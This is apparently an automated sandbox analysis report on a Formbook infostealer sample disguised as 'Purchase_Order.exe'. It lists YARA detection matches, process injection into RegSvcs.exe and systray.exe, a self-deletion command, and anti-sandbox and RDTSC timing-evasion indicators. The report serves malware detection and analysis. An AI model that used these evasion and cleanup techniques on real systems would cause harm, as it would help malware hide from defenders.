            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01341D55
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A2581
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0128D5E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013425DD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0128841F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0133D466
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01341FF1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134DFCE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01296E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0133D616
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01342EF7
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05032D07
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05031D55
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05022D82
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F8B477
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_050325DD
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F7841F
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F7D5E0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_0502D466
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F92581
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05024496
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F60D20
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F86E30
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_0503DFCE
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05031FF1
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_0502D616
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05032EF7
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F920A0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F7B090
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F8A830
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05021002
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_0503E824
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F899BF
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_050320A8
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F84120
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_050328EC
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F6F900
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05032B28
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_0500CB4F
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_0502DBD2
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_050203DA
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_050123E3
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F9ABD8
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_0501FA2B
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F9EBB0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_050322AE
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F8AB40
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05024AEF
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F8A309
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_010C2D8D
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_010C2D90
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_010DC40A
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_010C8C1A
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_010C8C5C
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_010C8C60
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_010C2FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0127B150 appears 72 times
            Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 04F6B150 appears 136 times
            Source: Purchase_Order.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Purchase_Order.exeBinary or memory string: OriginalFilename vs Purchase_Order.exe
            Source: Purchase_Order.exe, 00000000.00000002.271664791.0000000007F50000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKygo.dll* vs Purchase_Order.exe
            Source: Purchase_Order.exe, 00000000.00000002.272587457.0000000008220000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs Purchase_Order.exe
            Source: Purchase_Order.exe, 00000000.00000000.232767352.00000000005B6000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAsAnyMarshaler.exe6 vs Purchase_Order.exe
            Source: Purchase_Order.exe, 00000000.00000002.271267830.0000000007EC0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Purchase_Order.exe
            Source: Purchase_Order.exeBinary or memory string: OriginalFilenameAsAnyMarshaler.exe6 vs Purchase_Order.exe
            Source: Purchase_Order.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@13/10
            Source: C:\Users\user\Desktop\Purchase_Order.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase_Order.exe.logJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5552:120:WilError_01
            Source: C:\Users\user\Desktop\Purchase_Order.exeMutant created: \Sessions\1\BaseNamedObjects\rjmTOaAYwV
            Source: C:\Users\user\Desktop\Purchase_Order.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
            Source: Purchase_Order.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Purchase_Order.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\Purchase_Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
            Source: Purchase_Order.exeVirustotal: Detection: 20%
            Source: Purchase_Order.exeReversingLabs: Detection: 15%
            Source: C:\Users\user\Desktop\Purchase_Order.exeFile read: C:\Users\user\Desktop\Purchase_Order.exe:Zone.IdentifierJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Purchase_Order.exe 'C:\Users\user\Desktop\Purchase_Order.exe'
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
            Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: C:\Users\user\Desktop\Purchase_Order.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: Purchase_Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Purchase_Order.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: Purchase_Order.exeStatic file information: File size 1532416 > 1048576
            Source: Purchase_Order.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x14da00
            Source: Purchase_Order.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Purchase_Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: systray.pdb source: RegSvcs.exe, 00000004.00000002.320790980.0000000001240000.00000040.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.291292827.000000000E140000.00000002.00000001.sdmp
            Source: Binary string: systray.pdbGCTL source: RegSvcs.exe, 00000004.00000002.320790980.0000000001240000.00000040.00000001.sdmp
            Source: Binary string: RegSvcs.pdb, source: systray.exe, 00000010.00000002.507122760.0000000005477000.00000004.00000001.sdmp
            Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\LQmcYtPAJD\src\obj\Debug\AsAnyMarshaler.pdb source: Purchase_Order.exe
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000004.00000002.321048424.000000000136F000.00000040.00000001.sdmp, systray.exe, 00000010.00000002.505423938.0000000004F40000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, systray.exe
            Source: Binary string: RegSvcs.pdb source: systray.exe, 00000010.00000002.507122760.0000000005477000.00000004.00000001.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.291292827.000000000E140000.00000002.00000001.sdmp
            Source: C:\Users\user\Desktop\Purchase_Order.exeCode function: 0_2_004F73C3 push 0000006Fh; ret
            Source: C:\Users\user\Desktop\Purchase_Order.exeCode function: 0_2_004F67F4 push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004160EF push ebp; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00415250 push 00000036h; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004152DE push ebp; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041B3B5 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041B46C push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041B402 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041B40B push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00414E67 pushfd ; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012CD0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FBD0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_010D60EF push ebp; retf
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_010DB3B5 push eax; ret
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_010D5250 push 00000036h; ret
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_010D52DE push ebp; retf
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_010DB40B push eax; ret
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_010DB402 push eax; ret
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_010DB46C push eax; ret
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_010D4E67 pushfd ; retf
            Source: initial sampleStatic PE information: section name: .text entropy: 7.38800218232
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Purchase_Order.exe PID: 1528, type: MEMORY
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 00000000010C85E4 second address: 00000000010C85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 00000000010C897E second address: 00000000010C8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004088B0 rdtsc
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 240000
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 239844
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 239656
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 239531
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 239422
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 239313
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 239188
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 239000
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 238891
